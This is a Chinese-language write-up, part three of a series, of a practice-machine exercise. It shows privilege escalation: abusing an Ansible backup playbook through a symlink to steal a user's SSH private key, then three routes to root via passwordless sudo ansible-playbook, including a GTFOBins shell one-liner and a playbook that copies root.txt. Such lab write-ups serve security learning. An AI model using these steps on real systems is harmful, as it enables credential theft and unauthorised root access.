迷糊的提权方式以及利用ssrf到最终提权靶机(三)

简介: 迷糊的提权方式以及利用ssrf到最终提权靶机

提权

在查看进程的时候发现了一个有趣的进程

3cec2dc593fec870944c80233b67888c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

命令:ps aux | grep root然后我们看看run.yml文件

0314b10136d9c469b3415cbb5f186be8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现tomcat只有读的权限cat /opt/backups/playbook/run.yml

b4fbd75dfaf80c33657a7b6c9c7db6ba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

第 4 行至关重要。看起来这里脚本copy_links=yes在src和dest文件之间建立了符号链接(As )。然后在第 8 行,它/opt/backups/archives以 gzip 格式备份文件。检查/var/lib/tomcat9/webapps/ROOT/admin/dashboard目录,

339340bd8cf1cdc2e8b2ce6f29f020ff_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现只有uploads目录可写网上了解搜索一下ansible playbook:https://blog.51cto.com/u_9019400/2385520这个yml是在做文件备份所以创建一个指向luis的id_rsa的软链接文件,我们可以把它放到/uploads目录中命令:ln -s ~/home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa然后可以在/opt/backups/archives下看到gz文件 然后解压

257d6ba4c607a07b4b4d3ef00c204b03_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后将压缩文件复制到tmp目录下

3765ada3fc019539d22be89a4b5d0226_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后解压

784297cd0d900bb5969c27036cd7b572_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

命令:tar -xvf t.tar.gz切换到uploads目录然后查看id_rsa

806a30569b2e605c95fd71a6ae1ba4df_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

保存到本地然后ssh 连接 但是在连接之前 需要给chmod 600

b6af5e04ef3cefbfde13c47f272fa730_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

77647329de95841d570079e57a3ccd38_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后成功查看user.txtcat user.txt

060c46c4ad186fd5a4d29b10cfa494f7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

提权root

第一种提权

sudo -l

d8d1c553a627245c98f6155274c1f3dd_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现luis不用密码就可以以root 执行ansible-playebook直接在提权网址发现一个提权方式

879c41213ff0921c3faf7542ee526f7f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

命令:TF=$(mktemp)echo ‘[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]‘ >$TFsudo ansible-playbook $TF

这样提权太快了提权网址:https://gtfobins.github.io/#

第二种提权:

创建一个root.yml文件

13389e230e27dc665696ae8e5654eaa9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后:sudo /usr/bin/ansible-playbook root.yml

013ccc7f989e0ceaa3f5d3ee2843a391_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

第三种则是直接复制root.txt 也是创建yml文件

name: Ansible Copy Example Local to Remote
hosts: localhost
tasks:
  name: copying file with playbook
  become: true
  copy:
  src: /root/root.txt
  dest: /dev/shm
  owner: luis
  group: luis
  mode: 0777

使用sudo /usr/bin/ansible-playbook执行root.yml文件然后在dev/shm下找到root.txt

496e09201e7bfe7052206b810275e8a6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总结

通过这两个靶机 还是学到了不少 ssrf的利用 通过返回包看见a标签里面有一个路径 然后ssrf读取 发现密钥 到最后通过 pdb提权以及tomcat的..;绕过的方式 然后上传war 拿下shell 以及后面的利用ansible-playbook提权最后 还是知识面不够阿有什么不足 写得不对的地方 求师傅们指点

相关文章
|
7月前
|
安全 PHP Apache
记一次匈牙利服务器提权案例
记一次匈牙利服务器提权案例
55 0
|
7月前
|
安全 NoSQL API
【漏洞复现】YApi NoSQL注入导致远程命令执行漏洞
YApi是一个API管理工具。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
470 1
|
7月前
|
开发框架 安全 .NET
记一次绕过安全狗和360提权案例
记一次绕过安全狗和360提权案例
95 0
|
7月前
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
171 1
|
7月前
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
211 0
|
7月前
|
XML 开发框架 安全
记一次后门爆破到提权实战案例
记一次后门爆破到提权实战案例
49 0
|
7月前
|
开发框架 安全 .NET
记一次绕过安全狗命令执行上线
记一次绕过安全狗命令执行上线
114 1
|
10月前
|
安全 数据安全/隐私保护
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
431 0
|
11月前
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
|
Shell 网络安全 API
迷糊的提权方式以及利用ssrf到最终提权靶机(一)
迷糊的提权方式以及利用ssrf到最终提权靶机
68 0
迷糊的提权方式以及利用ssrf到最终提权靶机(一)

热门文章

最新文章